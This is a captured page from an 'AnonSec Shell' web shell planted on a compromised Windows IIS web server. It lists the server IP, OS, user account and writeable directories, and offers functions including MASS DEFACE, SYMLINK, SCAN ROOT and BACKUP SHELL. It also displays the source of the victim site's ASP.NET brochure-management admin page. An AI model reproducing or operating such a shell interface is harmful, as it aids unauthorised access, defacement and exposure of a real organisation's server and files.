. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . AnonSec Shell
AnonSec Shell
Server IP : 87.98.249.37  /  Your IP : 216.73.216.208   [ Reverse IP ]
Web Server : Microsoft-IIS/10.0
System : Windows NT NS3076740 10.0 build 17763 (Windows Server 2019) AMD64
User : IWPD_292(growel19p) ( 0)
PHP Version : 8.3.12
Disable Function : NONE
Domains : 0 Domains
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/Inetpub/vhosts/growel.com/httpdocs/GrowelAdmin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : C:/Inetpub/vhosts/growel.com/httpdocs/GrowelAdmin//ManageBrochures.aspx
<%@ Page Title="" Language="C#" MasterPageFile="~/GrowelAdmin/Admin.Master" AutoEventWireup="true" CodeBehind="ManageBrochures.aspx.cs" Inherits="GrowelWeb.GrowelAdmin.ManageBrochures" %>


<asp:Content ID="Content1" ContentPlaceHolderID="head" Runat="Server">

    <script>
        $(function () {


            $("#sortable").sortable();
            $("#sortable").disableSelection();

            $("#order").click(function () {

                saveOrder();


            });




        });

        function saveOrder() {

            $("#stat").fadeIn(100);
            $("#stat").html("Please wait");

            var selectedLanguage = new Array();
            $('#sortable .sort').each(function () {
                selectedLanguage.push($(this).attr("title"));
            });

            var bt = $('#<%=ddlbusinessType.ClientID %>').val();
            //alert(bt);

            $.ajax({
                url: 'sorttypes.aspx?types=' + selectedLanguage + '&bt=' + bt,
                dataType: "html",
                type: 'POST', //I want a type as POST
                data: "types=" + selectedLanguage + "&bt=" + bt,
                success: function (data) {
                    $("#stat").html("New Order Saved");
                    //  alert("New Order is saved.")
                    //location.reload();
                }
            });

        }
    </script>

</asp:Content>
<asp:Content ID="Content2" ContentPlaceHolderID="ContentPlaceHolder1" Runat="Server">

     <h3>Manage Brochures</h3>
    
   <div class="btn-danger status" visible="false" runat="server" id="status"></div>

    <div class="topbutton">
        <asp:Button ID="btnaddtype" runat="server" Text="Add New Brochures"  CssClass="btn btn-default" OnClick="btnaddtype_Click" />
    </div>

<table cellspacing="0" cellpadding="4" border="0" class="form" width="90%">
<tr>
  <td>Select Business Vertical
      <asp:DropDownList ID="ddlbusinessType" runat="server" CssClass="form-control form-inline">
      </asp:DropDownList> 
    </td><td><br /><asp:Button ID="btnsubmit" runat="server" Text="Display"  CssClass="btn btn-info" OnClick="btnsubmit_Click" /></td>
</tr>
</table>
    <div id="sortable">
      <asp:Repeater ID="gdvtypes" runat="server">
          <ItemTemplate>
              <div class="col-md-3 sort" id='img<%# Container.ItemIndex + 1 %>' title='<%#Eval("Name") %>'>
                  <div class="thumb">
                  <div style="min-height:45px"><b><%#Eval("Name") %></b></div>
                      <div>
                          <img class='img-fluid' style='margin-bottom: 20px;border: 1px solid #d6d6d6;' src='../images/download/<%#Eval("imgName") %>'  />
                      </div>
                   <div>
                       <a href='AddEditBrochure.aspx?BrochureId=<%#Eval("Id") %>'>Edit</a> 
                       <asp:LinkButton ID="lnkdelete" OnCommand="lnkdelete_click"  runat="server" OnClientClick="return confirm('Delete Type? All Peoducts Will be lost')" Text="Delete" CommandArgument='<%#Eval("Id") %>'></asp:LinkButton></div>
                      
              </div>
          </div>
          </ItemTemplate>
      </asp:Repeater>
</div>
    <br clear="all" />
        <%--<div class="btn btn-default" id="order">Save order</div>--%>
        <div class="clearfix" style="padding:10px;font-weight:bold;" id="stat"></div>
</asp:Content>

Anon7 - 2022
AnonSec Team